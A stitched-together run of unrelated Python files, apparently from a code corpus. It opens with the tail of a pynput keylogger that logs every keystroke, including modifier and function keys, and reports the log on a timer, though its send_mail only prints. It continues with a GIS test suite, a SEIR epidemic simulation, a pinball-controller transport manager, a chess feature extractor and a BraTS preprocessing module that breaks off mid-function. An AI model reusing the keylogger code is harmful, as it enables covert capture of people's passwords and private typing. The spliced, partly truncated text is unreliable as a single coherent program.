print(f"[!] Failed to Execute \"Log Data Distinguisher Function\" Error: {e} ")
try:
current_key += str(key.char)
except AttributeError:
if key == key.space:
current_key += " "
elif key == key.enter:
current_key += " [ENTER] "
elif key == key.backspace:
current_key += " [BACKSPACE] "
elif key == key.ctrl_l or key == key.ctrl_r:
current_key += " [CTRL] "
elif key == key.shift or key == key.shift_r:
current_key += " [SHIFT] "
elif key == key.delete:
current_key += " [DELETE] "
elif key == key.esc:
current_key += " [ESC] "
elif key == key.tab:
current_key += " [TAB] "
elif key == key.up:
current_key += " [UP] "
elif key == key.down:
current_key += " [DOWN] "
elif key == key.left:
current_key += " [LEFT] "
elif key == key.right:
current_key += " [RIGHT] "
elif key == key.cmd or key == key.cmd_r:
current_key += " [WINDOWS-KEY] "
elif key == key.f1:
current_key += " [F1] "
elif key == key.f2:
current_key += " [F2] "
elif key == key.f3:
current_key += " [F3] "
elif key == key.f4:
current_key += " [F4] "
elif key == key.f5:
current_key += " [F5] "
elif key == key.f6:
current_key += " [F6] "
elif key == key.f7:
current_key += " [F7] "
elif key == key.f8:
current_key += " [F8] "
elif key == key.f9:
current_key += " [F9] "
elif key == key.f10:
current_key += " [F10] "
elif key == key.f11:
current_key += " [F11] "
elif key == key.f12:
current_key += " [F12] "
elif key == key.alt_l or key == key.alt_r:
current_key += " [ALT] "
elif key == key.caps_lock:
current_key += " [CAPSLOCK] "
elif key == key.home:
current_key += " [HOME] "
else:
current_key += " " + str(key) + " "
append_to_log(current_key)
def send_mail():
print(log)
def report():
global log
send_mail()
log = ""
timer = threading.Timer(interval, report)
timer.start()
keyboard_listener = pynput.keyboard.Listener(on_press=process_key_press)
with keyboard_listener:
report()
keyboard_listener.join() |
import unittest
import json
import os
import sys
sys.path.append('../')
from tasks.utils import task_utils
class TestTaskUtils(unittest.TestCase):
"""Test case for testing the processing task utility functions."""
@classmethod
def setUpClass(self):
self.fl = '&fl=id,name:[name],format,path,fullpath:[absolute],absolute_path:[absolute],[thumbURL],[lyrFile],[lyrURL],[downloadURL],[lyrURL]'
self.query = 'http://localhost:8888/solr/v0/select?&wt=json{0}'.format(self.fl)
self.items = None
with open(os.path.join(os.getcwd(), 'test_utils.json')) as data_file:
self.request = json.load(data_file)
self.parameters = self.request['params']
self.result_count, self.response_index = task_utils.get_result_count(self.parameters)
self.qi = task_utils.QueryIndex(self.parameters[self.response_index])
self.fq = self.qi.get_fq()
self.query += self.fq
self.service_layer = task_utils.ServiceLayer("http://sampleserver1.arcgisonline.com/ArcGIS/rest/services/PublicSafety/PublicSafetyOperationalLayers/MapServer/5")
self.layer_files = '../supportfiles/basemaps'
self.mxd_template = '../supportfiles/MapTemplate.mxd'
@classmethod
def tearDownClass(self):
pass
def test_result_count(self):
"""Tests the number of requests"""
self.assertEqual(self.result_count, 119)
def test_query_string(self):
"""Tests getting the query string from the request"""
expected = 'http://localhost:8888/solr/v0/select?&wt=json&fl=id,name:[name],format,path,fullpath:[absolute],absolute_path:[absolute],[thumbURL],[lyrFile],[lyrURL],[downloadURL],[lyrURL]&fq=location:baad8134e9644fc7&q=id:(25107622%20T14C47A34AF9_states_1%20T14C47A34AF9_states_8%20de71138aeb803dae%20df08413d8acdaba2%208fc582b9845105f8%202510bce8e885b1dc_0003%203adbb78602e5df2b%20726262e2a1b25862_0000%20a3fbb3a1f9ed41f8be16abc384673372),usa'
self.assertEqual(self.query, expected)
def test_get_items(self):
"""Tests the get_items and get_data_path functions"""
self.items = task_utils.get_input_items([{'path': os.path.join(os.getcwd(), 'test-data', 'usstates.shp'), 'name': 'USStates'},
{'path': os.path.join(os.getcwd(), 'test-data', 'USA.mxd'), 'name': 'USA'},
{'path':'', 'absolute_path':'', '[lyrFile]': os.path.join(os.getcwd(), 'test-data', 'Cities.lyr'), 'name': 'Cities', 'format': ''}])
expected_items = {'{0}\\test-data\\usstates.shp'.format(os.getcwd()): 'USStates',
'{0}\\test-data\\USA.mxd'.format(os.getcwd()): 'USA',
'{0}\\test-data\\Cities.lyr'.format(os.getcwd()): 'Cities'}
self.assertDictEqual(expected_items, self.items)
def test_list_files(self):
"""Tests get the list of component files"""
shp_files = ('shp', 'shx', 'sbn', 'dbf', 'prj', 'cpg', 'shp.xml', 'dbf.xml')
files = task_utils.list_files(os.path.join(os.getcwd(), 'test-data', 'usstates.shp'), shp_files)
expected_files = ['{0}\\test-data\\usstates.shp'.format(os.getcwd()),
'{0}\\test-data\\usstates.shx'.format(os.getcwd()),
'{0}\\test-data\\usstates.sbn'.format(os.getcwd()),
'{0}\\test-data\\usstates.dbf'.format(os.getcwd()),
'{0}\\test-data\\usstates.prj'.format(os.getcwd()),
'{0}\\test-data\\usstates.cpg'.format(os.getcwd()),
'{0}\\test-data\\usstates.shp.xml'.format(os.getcwd())]
self.assertItemsEqual(expected_files, files)
def test_get_increment(self):
"""Test gettig a suitable base 10 increment"""
increment = task_utils.get_increment(43567)
self.assertEqual(increment, 1000)
def test_data_frame_name(self):
"""Test getting a map docmment data frame name without a layer name in the path"""
expected_name = task_utils.get_data_frame_name(r"C:\GISData\mxds\USRivers.mxd | Layers").strip()
self.assertEqual(expected_name, "Layers")
def test_data_frame_name_with_layer(self):
"""Test getting a map docmment data frame name with a layer name in the path"""
name = task_utils.get_data_frame_name('C:\GISData\mxds\USRivers.mxd | Layers\Rivers')
self.assertEqual(name, 'Layers')
def test_service_layer_wkid(self):
"""Test getting the service layer WKID"""
wkt = self.service_layer.wkid
expected_wkt = 4326
self.assertEqual(expected_wkt, wkt)
def test_service_layer_objectids(self):
"""Test get the service layer objectids"""
ids = self.service_layer.object_ids
id_count = sum([len(group) for group in ids])
expected_count = 100
self.assertEqual(expected_count, id_count)
def test_service_layer_oid_field_name(self):
"""Test getting the service lyaer object id field"""
oid_field_name = self.service_layer.oid_field_name
expected_name = "OBJECTID"
self.assertEqual(expected_name, oid_field_name)
def test_grouper(self):
"""Test grouping a list into chunks"""
groups = task_utils.grouper(range(0, self.result_count), task_utils.CHUNK_SIZE, '')
self.assertEqual(len(list(groups)), 5)
def test_get_parameter_value(self):
"""Test to get a tasks parameter value"""
param_value = task_utils.get_parameter_value(self.parameters, 'output_format')
self.assertEqual(param_value, 'SHP')
def test_get_geodatabase_path(self):
"""Test get geodatabase path with no feature dataset"""
gdb_path = task_utils.get_geodatabase_path(r'c:\testdata\gdb1.gdb\tablename')
self.assertEqual(gdb_path, r'c:\testdata\gdb1.gdb')
def test_get_geodatabase_path_fds(self):
"""Test get geodatabase path with a feature dataset"""
gdb_path = task_utils.get_geodatabase_path(r'c:\testdata\gdb1.gdb\fds\tablename')
self.assertEqual(gdb_path, r'c:\testdata\gdb1.gdb')
def test_get_unique_strings(self):
"""Test get unique strings from a list of strings"""
tags = ['TEST', 'test', 'Test', 'TESTER', 'tester', 'Tester', 'VOYAGER']
unique_strings = task_utils.get_unique_strings(tags)
self.assertEqual(sorted(unique_strings), ['TEST', 'TESTER', 'VOYAGER'])
def test_dd_to_dms(self):
"""Test converting decimal degrees to degrees minutes seconds"""
import arcpy
dms = task_utils.dd_to_dms(-56.553191)
self.assertEqual(dms, (56, 33, 11.49))
def test_from_wkt_to_polygon(self):
"""Test converting WKT to a polygon object"""
poly = task_utils.from_wkt('POLYGON ((-180 -90, -180 90, 180 90, 180 -90, -180 -90))', 4326)
extent_min = ('{0:.1f}'.format(poly.extent.XMax), '{0:.1f}'.format(poly.extent.YMax))
self.assertEqual(extent_min, ('180.0', '90.0'))
def test_get_spatial_reference(self):
"""Test getting a spatial reference from SR code"""
sr = task_utils.get_spatial_reference(4326)
self.assertEqual(sr.name, 'GCS_WGS_1984')
def test_get_projection_file(self):
"""Test get the projection file name from SR code"""
pf = task_utils.get_projection_file(4326)
self.assertEqual(os.path.basename(pf), 'WGS 1984.prj')
def test_get_clip_region(self):
"""Test getting a clip region from WKT"""
wkt = 'MULTIPOLYGON (((-75.759298375698563 41.391337611891402, -75.759298375698563 49.022078452247342, -92.303148066299968 49.022078452247342, -92.303148066299968 41.391337611891402, -75.759298375698563 41.391337611891402)))'
clip_region = task_utils.get_clip_region(wkt, 3857)
extent_min = ('{0:.1f}'.format(clip_region.XMax), '{0:.1f}'.format(clip_region.YMax))
self.assertEqual(extent_min, ('-8433486.5', '6278608.5'))
def test_get_local_date(self):
"""Test gettting local date"""
ld = task_utils.get_local_date()
self.assertIsNotNone(ld)
def test_zip_data(self):
"""Test zipping a folder"""
import tempfile
import shutil
temp = tempfile.mkdtemp()
zf = task_utils.zip_data(temp, 'test.zip')
self.assertTrue(zf.endswith('.zip'))
shutil.rmtree(temp)
|
<filename>india/COVID_Model.py
import numpy as np
from math import sqrt, floor, exp
import copy
import matplotlib.pyplot as plt
class City:
def __init__(self, opt):
self.units_num = opt['units']
self.L = int(sqrt(self.units_num))
assert self.L ** 2 == self.units_num
self.unit_dist = opt['unit_distance'] # physical distance of each unit block
# Init disease params
self.disease_params = dict()
self.disease_params['Pi'] = opt['Pi'] # transmission rate of I
self.disease_params['Pe'] = opt['Pe'] # transmission rate of E
self.disease_params['PE'] = opt['PE'] # probability of a health people to be E when get infected
self.disease_params['e_to_i'] = opt['e_to_i'] # probability of the a E turn to I
self.disease_params['i_to_r'] = opt['i_to_r'] # recover rate of I
# Init policy params
self.policy_params = dict()
self.policy_params['mobility'] = opt['mobility'] # Mobility rate of gravity model
self.policy_params['self_quarantine'] = opt['self_quarantine'] # self quarantine of S
self.policy_params['ki_discount'] = opt['ki_disc'] # discount of I when moving
self.policy_params['ke_discount'] = opt['ke_disc'] # discount of E when moving
self.policy_params['P_i_discount'] = opt['Pi_disc'] # discount of transmission rate of I
self.policy_params['P_e_discount'] = opt['Pe_disc'] # discount of transmission rate of E
self.policy_params['early_detect'] = opt['early_detect'] # early detect rate (to accelerate I to R)
if opt.__contains__('cases_bias'):
self.cases_bias = opt['cases_bias']
if opt.__contains__('init_cases_num'):
self.init_cases_num = opt['init_cases_num']
# Init the blocks for SEIR model
self.blocks_matrix = np.zeros((self.units_num, 4)) # unit number x SEIR
# Init the distance matrix for moving (for faster speed)
self.dist_matrix = np.ones((self.units_num,self.units_num))
for i in range(self.units_num):
for j in range(self.units_num):
if i != j:
x_i = int(floor(i / self.L))
y_i = int(floor(i % self.L))
x_j = int(floor(j / self.L))
y_j = int(floor(j % self.L))
self.dist_matrix[i,j] = exp((abs(x_i - x_j) + abs(y_i - y_j)) * self.unit_dist / 82)
def setPopCases(self,pop, cases):
pop_cp = copy.deepcopy(pop)
cases_copy = copy.deepcopy(cases)
cases_copy = cases_copy.reshape(-1)
self.pop = pop_cp.astype(int)
self.cases = cases_copy.astype(int)
self.max_pop = int(pop_cp.max() * 1.2)
def get_blk_pop(self):
return self.blocks_matrix.sum(axis=1).reshape(-1)
def fit(self, pi, early_detect, mobility):
self.disease_params['Pi'] = float(pi)
self.disease_params['Pe'] = float(pi)
self.policy_params['early_detect'] = float(early_detect)
self.policy_params['mobility'] = float(mobility)
self.blocks_matrix = np.zeros((self.units_num, 4))
self.init_blocks(self.pop, manual_init_case=True)
cases_cp = copy.deepcopy(self.cases)
S,E,I,R,new_spread = self.begin_simulate(len(cases_cp),fit=True)
new_spread = new_spread.cumsum()
new_spread = new_spread.reshape(-1)
diff = -np.square(new_spread + self.cases_bias - cases_cp).sum()
assert ~np.isnan(diff)
print(diff)
return diff
def fit_second(self,pi, early_detect, mobility):
self.disease_params['Pi'] = float(pi)
self.disease_params['Pe'] = float(pi)
self.policy_params['early_detect'] = float(early_detect)
self.policy_params['mobility'] = float(mobility)
self.blocks_matrix = np.zeros((self.units_num, 4))
self.init_blocks(self.pop, ckpt = True)
cases_cp = copy.deepcopy(self.cases)
S,E,I,R,new_spread = self.begin_simulate(len(cases_cp),fit=True)
new_spread = new_spread.cumsum()
new_spread = new_spread.reshape(-1)
new_spread += self.ckpt['total_infect']
diff = -np.square(new_spread + self.cases_bias - cases_cp).sum()
assert ~np.isnan(diff)
print(diff)
return diff
def init_blocks(self, population, ckpt = False,manual_init_case=False):
if not ckpt:
pop_copy = copy.deepcopy(population)
init_case_index = np.argsort(pop_copy.reshape(-1))[-self.init_cases_num:]
self.max_pop = int(pop_copy.max() * 1.2)
for idx in range(self.units_num):
if idx in init_case_index:
self.blocks_matrix[idx, 0] = pop_copy[idx] #S
self.blocks_matrix[idx, 2] = 1 #I
else:
self.blocks_matrix[idx,0] = pop_copy[idx] #S
else:
self.blocks_matrix = copy.deepcopy(self.ckpt['data'])
def move(self,fit=True):
""" Move individuals according to gravity model. It can achieve no uncertenty at all, at the cost of efficiency
return:
none
"""
pop_vec = self.get_blk_pop() # unit_num x 1
assert pop_vec.min() >= 0
pop_vec_cp = copy.deepcopy(pop_vec).reshape(-1,1).tolist()
move_matrix = self.policy_params['mobility'] * (np.power(pop_vec_cp,0.46).reshape(-1,1) * np.power(pop_vec_cp,0.64).T)
move_matrix = move_matrix / self.dist_matrix
for i in range(move_matrix.shape[0]):
move_matrix[i,i] = 0
pop = self.blocks_matrix.sum(axis=1)
out_num = move_matrix.sum(axis=1)
violate_index = out_num > pop
if violate_index.sum() > 0:
move_matrix[violate_index,:] = move_matrix[violate_index,:] / out_num[violate_index].reshape(-1,1) * pop[violate_index].reshape(-1,1)
proportion = self.blocks_matrix / self.blocks_matrix.sum(axis=1,keepdims=True)
proportion[np.isnan(proportion)] = 0
move_with_proportion = np.expand_dims(move_matrix,2) * np.expand_dims(proportion,1)
move_out = np.floor(move_with_proportion.sum(axis=1))
#move_in = np.floor(move_with_proportion.sum(axis=0))
move_out_E_index = np.argsort(move_with_proportion[:, :, 1], axis=1)[:,::-1]
move_out_I_index = np.argsort(move_with_proportion[:, :, 2], axis=1)[:,::-1]
for i in range(move_with_proportion.shape[0]):
j = 0
while move_out[i, 1] > 0:
out_num = np.ceil(move_with_proportion[i, move_out_E_index[i,j], 1])
move_with_proportion[i, move_out_E_index[i,j], 1] = out_num
move_out[i, 1] -= out_num
j += 1
move_with_proportion[i, move_out_E_index[i,j:], 1] = 0
j = 0
while move_out[i, 2] > 0:
out_num = np.ceil(move_with_proportion[i, move_out_I_index[i,j], 2])
move_with_proportion[i, move_out_I_index[i,j], 2] = out_num
move_out[i, 2] -= out_num
j += 1
move_with_proportion[i, move_out_I_index[i,j:], 2] = 0
move_out = np.floor(move_with_proportion.sum(axis=1))
move_in = np.floor(move_with_proportion.sum(axis=0))
move = move_in - move_out
self.blocks_matrix = self.blocks_matrix + move
self.blocks_matrix[self.blocks_matrix<0] = 0
assert np.isnan(self.blocks_matrix).sum() < 1
if not fit:
return np.abs(np.linalg.eigvals(move_matrix)).max()
def spread(self):
#Step0. Self quarantine
S_quarantine = self.blocks_matrix[:,0] * self.policy_params['self_quarantine']
self.blocks_matrix[:, 0] -= S_quarantine
self.blocks_matrix[:, 3] += S_quarantine
I_quarantine = np.where((self.blocks_matrix[:,2] * self.policy_params['early_detect']) < 1, np.zeros((self.blocks_matrix.shape[0])), self.blocks_matrix[:,2] * self.policy_params['early_detect'])
self.blocks_matrix[:,2] -= I_quarantine
E_quarantine = np.where((self.blocks_matrix[:, 1] * self.policy_params['early_detect']) < 1,
np.zeros((self.blocks_matrix.shape[0])),
self.blocks_matrix[:, 1] * self.policy_params['early_detect'])
self.blocks_matrix[:, 1] -= E_quarantine
self.blocks_matrix[:, 3] += (I_quarantine + E_quarantine)
# Step2.Transmission
S_infect = self.blocks_matrix[:,0] * self.blocks_matrix[:,1] * self.disease_params['Pe'] + self.blocks_matrix[:,0] * self.blocks_matrix[:,2] * self.disease_params['Pi']
S_infect[S_infect > self.blocks_matrix[:,0]] = 0
E_new = S_infect * self.disease_params['PE']
I_new = S_infect - E_new
# Step3. E_to_I
E_to_I = self.blocks_matrix[:,1] * self.disease_params['e_to_i']
# Step4. I_to_R
I_to_R = self.blocks_matrix[:, 2] * self.disease_params['i_to_r']
# Step5. Update parameters
self.blocks_matrix[:, 0] -= S_infect
self.blocks_matrix[:, 1] += (E_new - E_to_I)
self.blocks_matrix[:, 2] += (I_new + E_to_I - I_to_R)
self.blocks_matrix[:, 3] += I_to_R
assert np.isnan(self.blocks_matrix).sum() < 1
return (I_new + E_to_I).sum()
def move_and_spread(self,fit = True):
if fit:
self.move()
else:
move_rho = self.move()
newly_spread = self.spread()
if fit:
return newly_spread
else:
return newly_spread,move_rho
def begin_simulate(self, iter_num, fit = True):
S = np.zeros((1, iter_num))
E = np.zeros((1, iter_num))
I = np.zeros((1, iter_num))
R = np.zeros((1, iter_num))
new_spread = np.zeros((1, iter_num))
if not fit:
move_rho = np.zeros((1, iter_num))
for i in range(iter_num):
S[0, i] = self.blocks_matrix[:, 0].sum()
E[0, i] = self.blocks_matrix[:, 1].sum()
I[0, i] = self.blocks_matrix[:, 2].sum()
R[0, i] = self.blocks_matrix[:, 3].sum()
new_spread[0, i], move_rho[0, i] = self.move_and_spread(fit)
return S, E, I, R, new_spread, move_rho
else:
for i in range(iter_num):
S[0, i] = self.blocks_matrix[:, 0].sum()
E[0, i] = self.blocks_matrix[:, 1].sum()
I[0, i] = self.blocks_matrix[:, 2].sum()
R[0, i] = self.blocks_matrix[:, 3].sum()
new_spread[0, i] = self.move_and_spread(fit)
return S, E, I, R, new_spread
def begin_simulate_multi_parted(self,opts_list,cases_list,save_path, fit = True):
epochs = len(opts_list)
for i in range(epochs):
self.disease_params['Pi'] = float(opts_list[i]['Pi'])
self.disease_params['Pe'] = float(opts_list[i]['Pi'])
self.policy_params['early_detect'] = float(opts_list[i]['early_detect'])
self.policy_params['mobility'] = float(opts_list[i]['mobility'])
self.blocks_matrix = np.zeros((self.units_num, 4))
self.init_blocks(self.pop, manual_init_case=(i == 0), ckpt=(i>0))
if not fit:
S_tmp, E_tmp, I_tmp, R_tmp, new_spread_tmp, move_rho = self.begin_simulate(len(cases_list[i]),fit)
else:
S_tmp, E_tmp, I_tmp, R_tmp, new_spread_tmp = self.begin_simulate(len(cases_list[i]), fit)
if i == 0:
S = S_tmp
E = E_tmp
I = I_tmp
R = R_tmp
new_spread = new_spread_tmp
else:
S = np.concatenate((S, S_tmp),axis=1)
E = np.concatenate((E, E_tmp),axis=1)
I = np.concatenate((I, I_tmp),axis=1)
R = np.concatenate((R, R_tmp),axis=1)
new_spread = np.concatenate((new_spread, new_spread_tmp), axis=1)
self.make_check_point(float(new_spread.cumsum()[-1]))
S = S.sum(axis=0)
E = E.sum(axis=0)
I = I.sum(axis=0)
R = R.sum(axis=0)
new_spread = new_spread.cumsum().reshape(-1) + self.cases_bias
cases_total = np.array(cases_list[0])
for i in range(epochs - 1):
cases_total = np.concatenate((cases_total,np.array(cases_list[i+1])))
#plt.plot(S, label="S")
plt.plot(E, label="E")
plt.plot(I, label="I")
#plt.plot(R, label="R")
plt.plot(new_spread, label='Total EI')
plt.plot(cases_total, label='True')
plt.ylabel("People")
plt.xlabel("Step")
plt.legend()
plt.tight_layout()
plt.savefig(fname=save_path, figsize=[8, 6])
plt.clf()
return new_spread
def make_check_point(self,total_infect):
self.ckpt = {'data':self.blocks_matrix,'total_infect':total_infect}
|
<reponame>pmansukhani/mpf
"""Classes which manage BCP transports."""
import asyncio
from typing import Union
from mpf.core.bcp.bcp_client import BaseBcpClient
MYPY = False # noqa
if MYPY:
from mpf.core.machine import MachineController # pylint: disable-msg=cyclic-import,unused-import
class BcpTransportManager:
"""Manages BCP transports."""
__slots__ = ["_machine", "_transports", "_readers", "_handlers"]
def __init__(self, machine):
"""Initialise BCP transport manager."""
self._machine = machine # type: MachineController
self._transports = []
self._readers = {}
self._handlers = {}
self._machine.events.add_handler("shutdown", self.shutdown)
def add_handler_to_transport(self, handler, transport: BaseBcpClient):
"""Register client as handler."""
if handler not in self._handlers:
self._handlers[handler] = []
if transport is None:
raise AssertionError("Cannot register None transport.")
self._handlers[handler].append(transport)
def remove_transport_from_handle(self, handler, transport: BaseBcpClient):
"""Remove client from a certain handler."""
if transport in self._handlers[handler]:
self._handlers[handler].remove(transport)
def get_transports_for_handler(self, handler):
"""Get clients which registered for a certain handler."""
return self._handlers.get(handler, [])
def register_transport(self, transport, future=None, **kwargs):
"""Register a client."""
del future
del kwargs
self._transports.append(transport)
self._readers[transport] = self._machine.clock.loop.create_task(self._receive_loop(transport))
self._readers[transport].add_done_callback(self._done)
@staticmethod
def _done(future):
"""Evaluate result of task.
Will raise exceptions from within task.
"""
try:
future.result()
except asyncio.CancelledError:
pass
@asyncio.coroutine
def _receive_loop(self, transport: BaseBcpClient):
while True:
try:
cmd, kwargs = yield from transport.read_message()
except IOError:
self.unregister_transport(transport)
return
yield from self._machine.bcp.interface.process_bcp_message(cmd, kwargs, transport)
def unregister_transport(self, transport: BaseBcpClient):
"""Unregister client."""
if transport in self._transports:
self._transports.remove(transport)
# remove transport from all handlers
for handler in self._handlers:
if transport in self._handlers[handler]:
self._handlers[handler].remove(transport)
if transport in self._readers:
self._readers[transport].cancel()
del self._readers[transport]
if transport.exit_on_close:
self._machine.stop("BCP client {} disconnected and exit_on_close is set".format(transport.name))
def get_all_clients(self):
"""Get a list of all clients."""
return self._transports
def get_named_client(self, client_name) -> Union[BaseBcpClient, bool]:
"""Get a client by name."""
for client in self._transports:
if client.name == client_name:
return client
return False
def send_to_clients(self, clients, bcp_command, **kwargs):
"""Send command to a list of clients."""
for client in set(clients):
self.send_to_client(client, bcp_command, **kwargs)
def send_to_clients_with_handler(self, handler, bcp_command, **kwargs):
"""Send command to clients which registered for a specific handler."""
clients = self.get_transports_for_handler(handler)
self.send_to_clients(clients, bcp_command, **kwargs)
def send_to_client(self, client: BaseBcpClient, bcp_command, **kwargs):
"""Send command to a specific bcp client."""
try:
client.send(bcp_command, kwargs)
except IOError:
client.stop()
self.unregister_transport(client)
def send_to_all_clients(self, bcp_command, **kwargs):
"""Send command to all bcp clients."""
for client in self._transports:
self.send_to_client(client, bcp_command, **kwargs)
def shutdown(self, **kwargs):
"""Prepare the BCP clients for MPF shutdown."""
del kwargs
for client in list(self._transports):
client.stop()
self.unregister_transport(client)
|
<reponame>Keesiu/meta-kaggle
#!/usr/bin/env python
import json, sys, argparse
from chess import *
from chess.pgn import *
# returns "NE", "SW" etc for a move, from the players perspective
# and also the distance moved
def move_direction_and_distance(board, move):
from_file = file_index(move.from_square)
from_rank = rank_index(move.from_square)
to_file = file_index(move.to_square)
to_rank = rank_index(move.to_square)
file_move = to_file - from_file
rank_move = to_rank - from_rank
if node.board().turn == chess.BLACK:
file_move = -1 * file_move
rank_move = -1 * rank_move
ns_letter = ""
if rank_move > 0:
ns_letter = "N"
elif rank_move < 0:
ns_letter = "S"
ew_letter = ""
if file_move > 0:
ew_letter = "E"
elif file_move < 0:
ew_letter = "W"
return (ns_letter + ew_letter), max(abs(file_move), abs(rank_move))
# returns a comma-separated string representing the features of this move
def features(board, move):
if move is None:
return ", ".join([""] * 5)
move_dir, move_dist = move_direction_and_distance(board, move)
board.push(move)
is_check = board.is_check()
board.pop()
result = ", ".join([board.piece_at(move.from_square).symbol().upper(),
move_dir,
str(move_dist),
str(board.piece_at(move.to_square) is not None),
str(is_check)
])
return result
parser = argparse.ArgumentParser(description='Produce a set of features for each move in a set of games. Output goes to stdout.')
parser.add_argument('pgn', help='PGN file of games')
parser.add_argument('jsoneval', help='JSON eval of games')
parser.add_argument('outfile', help='output file')
args = parser.parse_args()
best_moves = {}
output_fd = open(args.outfile, 'w')
print("Opening %s" % args.jsoneval)
json_fd = open(args.jsoneval, 'r')
results = json.load(json_fd)
for result in results:
game_num = int(result['event'])
best_moves[game_num] = result['best_moves']
print("Opening %s" % args.pgn)
game_fd = open(args.pgn, 'r')
game = read_game(game_fd)
while game is not None:
node = game
movenum = 0
game_num = int(game.headers['Event'])
print('Doing game %i' % game_num)
if game_num % 100 == 0:
sys.stdout.write('.')
while node.variations:
next_node = node.variation(0)
done_move = next_node.move
best_moves_list = best_moves.get(game_num)
if best_moves_list:
best_move_san = best_moves_list[movenum]
best_move = node.board().parse_san(best_move_san)
else:
best_move_san = ""
best_move = None
best_move_features = features(node.board(), best_move)
done_move_features = features(node.board(), done_move)
output_fd.write(', '.join([str(game_num),
str(movenum),
node.board().san(done_move),
done_move_features,
best_move_san,
best_move_features]))
output_fd.write('\n')
movenum = movenum + 1
node = next_node
game = read_game(game_fd)
output_fd.close()
|
<filename>guotai_brats17/data_process.py
# -*- coding: utf-8 -*-
# Implementation of Wang et al 2017: Automatic Brain Tumor Segmentation using Cascaded Anisotropic Convolutional Neural Networks. https://arxiv.org/abs/1709.00382
# Author: <NAME>
# Copyright (c) 2017-2018 University College London, United Kingdom. All rights reserved.
# http://cmictig.cs.ucl.ac.uk
#
# Distributed under the BSD-3 licence. Please see the file licence.txt
# This software is not certified for clinical use.
#
import os
import nibabel
import numpy as np
import random
from scipy import ndimage
import SimpleITK as sitk
DEBUG = False
def log(s):
if DEBUG:
print(s)
def search_file_in_folder_list(folder_list, file_name):
"""
Find the full filename from a list of folders
inputs:
folder_list: a list of folders
file_name: filename
outputs:
full_file_name: the full filename
"""
file_exist = False
for folder in folder_list:
full_file_name = os.path.join(folder, file_name)
if(os.path.isfile(full_file_name)):
file_exist = True
break
if(file_exist == False):
raise ValueError('{0:} is not found in {1:}'.format(file_name, folder))
return full_file_name
def load_3d_volume_as_array(filename):
if('.nii' in filename):
return load_nifty_volume_as_array(filename)
elif('.mha' in filename):
return load_mha_volume_as_array(filename)
raise ValueError('{0:} unspported file format'.format(filename))
def load_mha_volume_as_array(filename):
img = sitk.ReadImage(filename)
nda = sitk.GetArrayFromImage(img)
return nda
def load_nifty_volume_as_array(filename, with_header = False):
"""
load nifty image into numpy array, and transpose it based on the [z,y,x] axis order
The output array shape is like [Depth, Height, Width]
inputs:
filename: the input file name, should be *.nii or *.nii.gz
with_header: return affine and hearder infomation
outputs:
data: a numpy data array
"""
log(filename)
img = nibabel.load(filename)
data = img.get_data()
data = np.transpose(data, [2,1,0])
if(with_header):
return data, img.affine, img.header
else:
return data
def save_array_as_nifty_volume(data, filename, reference_name = None):
"""
save a numpy array as nifty image
inputs:
data: a numpy array with shape [Depth, Height, Width]
filename: the ouput file name
reference_name: file name of the reference image of which affine and header are used
outputs: None
"""
log(filename)
img = sitk.GetImageFromArray(data)
if(reference_name is not None):
img_ref = sitk.ReadImage(reference_name)
img.CopyInformation(img_ref)
sitk.WriteImage(img, filename)
def itensity_normalize_one_volume(volume):
"""
normalize the itensity of an nd volume based on the mean and std of nonzeor region
inputs:
volume: the input nd volume
outputs:
out: the normalized nd volume
"""
pixels = volume[volume > 0]
mean = pixels.mean()
std = pixels.std()
out = (volume - mean)/std
out_random = np.random.normal(0, 1, size = volume.shape)
out[volume == 0] = out_random[volume == 0]
return out
def get_ND_bounding_box(label, margin):
"""
get the bounding box of the non-zero region of an ND volume
"""
# print('the value of margin is ', margin)
input_shape = label.shape
if(type(margin) is int ):
margin = [margin]*len(input_shape)
assert(len(input_shape) == len(margin))
indxes = np.nonzero(label)
idx_min = []
idx_max = []
for i in range(len(input_shape)):
idx_min.append(indxes[i].min())
idx_max.append(indxes[i].max())
# print('idx_min: ', idx_min, 'idx_max: ', idx_max)
for i in range(len(input_shape)):
idx_min[i] = max(idx_min[i] - margin[i], 0)
idx_max[i] = min(idx_max[i] + margin[i], input_shape[i] - 1)
# print('idx_min', idx_min, 'idx_max', idx_max)
return idx_min, idx_max
def crop_ND_volume_with_bounding_box(volume, min_idx, max_idx):
"""
crop/extract a subregion form an nd image.
"""
dim = len(volume.shape)
assert(dim >= 2 and dim <= 5)
if(dim == 2):
output = volume[np.ix_(range(min_idx[0], max_idx[0] + 1),
range(min_idx[1], max_idx[1] + 1))]
elif(dim == 3):
output = volume[np.ix_(range(min_idx[0], max_idx[0] + 1),
range(min_idx[1], max_idx[1] + 1),
range(min_idx[2], max_idx[2] + 1))]
elif(dim == 4):
output = volume[np.ix_(range(min_idx[0], max_idx[0] + 1),
range(min_idx[1], max_idx[1] + 1),
range(min_idx[2], max_idx[2] + 1),
range(min_idx[3], max_idx[3] + 1))]
elif(dim == 5):
output = volume[np.ix_(range(min_idx[0], max_idx[0] + 1),
range(min_idx[1], max_idx[1] + 1),
range(min_idx[2], max_idx[2] + 1),
range(min_idx[3], max_idx[3] + 1),
range(min_idx[4], max_idx[4] + 1))]
else:
raise ValueError("the dimension number shoud be 2 to 5")
return output
def set_ND_volume_roi_with_bounding_box_range(volume, bb_min, bb_max, sub_volume):
"""
set a subregion to an nd image.
"""
dim = len(bb_min)
out = volume
if(dim == 2):
out[np.ix_(range(bb_min[0], bb_max[0] + 1),
range(bb_min[1], bb_max[1] + 1))] = sub_volume
elif(dim == 3):
out[np.ix_(range(bb_min[0], bb_max[0] + 1),
range(bb_min[1], bb_max[1] + 1),
range(bb_min[2], bb_max[2] + 1))] = sub_volume
elif(dim == 4):
out[np.ix_(range(bb_min[0], bb_max[0] + 1),
range(bb_min[1], bb_max[1] + 1),
range(bb_min[2], bb_max[2] + 1),
range(bb_min[3], bb_max[3] + 1))] = sub_volume
else:
raise ValueError("array dimension should be 2, 3 or 4")
return out
def convert_label(in_volume, label_convert_source, label_convert_target):
"""
convert the label value in a volume
inputs:
in_volume: input nd volume with label set label_convert_source
label_convert_source: a list of integers denoting input labels, e.g., [0, 1, 2, 4]
label_convert_target: a list of integers denoting output labels, e.g.,[0, 1, 2, 3]
outputs:
out_volume: the output nd volume with label set label_convert_target
"""
mask_volume = np.zeros_like(in_volume)
convert_volume = np.zeros_like(in_volume)
for i in range(len(label_convert_source)):
source_lab = label_convert_source[i]
target_lab = label_convert_target[i]
if(source_lab != target_lab):
temp_source = np.asarray(in_volume == source_lab)
temp_target = target_lab * temp_source
mask_volume = mask_volume + temp_source
